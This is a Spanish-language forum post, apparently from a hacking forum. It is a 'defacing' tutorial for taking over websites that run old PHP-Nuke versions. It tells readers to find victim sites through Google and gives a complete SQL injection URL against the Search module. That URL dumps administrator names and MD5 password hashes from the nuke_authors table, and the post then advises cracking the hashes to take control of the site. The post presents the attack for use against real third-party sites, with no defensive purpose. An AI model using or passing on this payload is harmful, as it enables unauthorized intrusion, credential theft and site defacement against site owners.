Bien siguiendo mi afan de llenar el foro de tutos sobre defacing,os explicare uno intermedio.
Con este deface lograremos tener el nick y la pass del admin de un sitio vulnerable y cuando eso suceda,poder hacer lo que te plazca con él.¿Te pica el gusanillo?
Empezemos...
Lo primero que tenemos que hacer es buscar una web victima, cuya web php sea de versión
6.9 o anterior.Le preguntaremos a un sabio,www.google.es.
Luego de que se encuentre el website a atacar se inserta en la URL la siguiente cadena:
modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Tendria que quedar asi:www.ejemplo.com/modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
A continuacion,cuando le hayamos dado nos dara el nombre de usuario y el pass encriptado en md5
de los administradores de ese website.
Ya solo queda buscar un crackeador de MD5 e introducir el hash en md5 en él y buala..
Espero que les haya gustado.
Página 1 de 1 Puede publicar nuevos temas en este foro No puede responder a temas en este foro No puede editar sus mensajes en este foro No puede borrar sus mensajes en este foro No puede votar en encuestas en este foro
